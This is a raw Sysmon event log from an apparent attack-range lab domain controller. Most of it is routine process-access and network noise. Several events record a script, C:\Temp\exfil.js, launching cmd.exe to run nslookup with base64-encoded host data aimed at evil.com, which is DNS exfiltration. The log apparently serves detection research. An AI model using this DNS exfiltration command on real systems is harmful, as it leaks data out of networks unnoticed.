14:21:38.097{2E1864BB-18F2-629A-8C44-000000005F02}54807280C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-8E44-000000005F02}2812C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.100{2E1864BB-18F2-629A-8E44-000000005F02}2812C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-8C44-000000005F02}5480C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlowmz.tmp 2>&1 10341000x8000000000000000211204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.060{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-8D44-000000005F02}5384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.060{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-8D44-000000005F02}5384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.060{2E1864BB-18F2-629A-8D44-000000005F02}53844336C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-8C44-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.029{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cf1e0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd 10341000x8000000000000000211200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.029{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+cecc1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000211199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.029{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFd9a827.TMPMD5=A303D473BA814FD6FAB43C1CB00819D2,SHA256=AA2A030E0B028A696C3F21587D451CD5CB68ED59621BA6CE0EF8E95415BF6D12,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000211198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{00000000-0000-0000-0000-000000000000}7000<unknown process>-udptruefalse127.0.0.1-50862-false127.0.0.1-53domain 354300x8000000000000000211197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.685{00000000-0000-0000-0000-000000000000}2944<unknown process>-udpfalsefalse127.0.0.1-50861-false127.0.0.1-53domain 354300x8000000000000000211196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.685{00000000-0000-0000-0000-000000000000}2944<unknown process>-udptruefalse127.0.0.1-50861-false127.0.0.1-53domain 354300x8000000000000000211195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.685{00000000-0000-0000-0000-000000000000}2944<unknown process>-udpfalsefalse127.0.0.1-50860-false127.0.0.1-53domain 354300x8000000000000000211194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.684{00000000-0000-0000-0000-000000000000}2944<unknown process>-udptruefalse127.0.0.1-50860-false127.0.0.1-53domain 354300x8000000000000000211193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.684{00000000-0000-0000-0000-000000000000}2944<unknown process>-udpfalsefalse127.0.0.1-50859-false127.0.0.1-53domain 354300x8000000000000000211192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.684{00000000-0000-0000-0000-000000000000}2944<unknown process>-udptruefalse127.0.0.1-50859-false127.0.0.1-53domain 10341000x8000000000000000211191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.029{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-8D44-000000005F02}5384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000211190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{00000000-0000-0000-0000-000000000000}7240<unknown process>-udpfalsefalse127.0.0.1-50858-false127.0.0.1-53domain 354300x8000000000000000211189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{00000000-0000-0000-0000-000000000000}7240<unknown process>-udptruefalse127.0.0.1-50858-false127.0.0.1-53domain 354300x8000000000000000211188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{00000000-0000-0000-0000-000000000000}7240<unknown process>-udpfalsefalse127.0.0.1-50857-false127.0.0.1-53domain 354300x8000000000000000211187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{00000000-0000-0000-0000-000000000000}7240<unknown process>-udptruefalse127.0.0.1-50857-false127.0.0.1-53domain 354300x8000000000000000211186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{00000000-0000-0000-0000-000000000000}7240<unknown process>-udpfalsefalse127.0.0.1-50856-false127.0.0.1-53domain 354300x8000000000000000211185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{00000000-0000-0000-0000-000000000000}7240<unknown process>-udptruefalse127.0.0.1-50856-false127.0.0.1-53domain 354300x8000000000000000211184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.523{00000000-0000-0000-0000-000000000000}5168<unknown process>-udpfalsefalse127.0.0.1-50855-false127.0.0.1-53domain 10341000x8000000000000000211183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.523{00000000-0000-0000-0000-000000000000}5168<unknown process>-udptruefalse127.0.0.1-50855-false127.0.0.1-53domain 10341000x8000000000000000211179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.997{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-8C44-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000211177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.523{00000000-0000-0000-0000-000000000000}5168<unknown process>-udpfalsefalse127.0.0.1-50854-false127.0.0.1-53domain 10341000x8000000000000000211176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.997{2E1864BB-18E0-629A-6742-000000005F02}39767944C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-8C44-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.000{2E1864BB-18F2-629A-8C44-000000005F02}5480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlowmz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000211174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.523{00000000-0000-0000-0000-000000000000}5168<unknown process>-udptruefalse127.0.0.1-50854-false127.0.0.1-53domain 354300x8000000000000000211173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.522{00000000-0000-0000-0000-000000000000}5168<unknown process>-udpfalsefalse127.0.0.1-50853-false127.0.0.1-53domain 354300x8000000000000000211172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{00000000-0000-0000-0000-000000000000}5136<unknown process>-udptruefalse127.0.0.1-50851-false127.0.0.1-53domain 354300x8000000000000000211171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.225{00000000-0000-0000-0000-000000000000}3916<unknown process>-udptruefalse127.0.0.1-50844-false127.0.0.1-53domain 354300x8000000000000000211170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-50832-false127.0.0.1-53domain 354300x8000000000000000211169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.812{00000000-0000-0000-0000-000000000000}4860<unknown process>-udpfalsefalse127.0.0.1-50830-false127.0.0.1-53domain 23542300x800000000000000044808Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:38.846{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28DEEB18D8A9A1A945D369E6C065FA50,SHA256=D38FA92F9D7177B93164ED847744540527DA0E4E806CDE26CEBD9E403635062F,IMPHASH=00000000000000000000000000000000falsetrue 154100x8000000000000000211762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.997{2E1864BB-18F3-629A-C844-000000005F02}2692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqcto.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.986{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgtunm.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.965{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.965{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.965{2E1864BB-18F3-629A-C644-000000005F02}35684280C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-C744-000000005F02}5692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.965{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.965{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.965{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C744-000000005F02}5692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 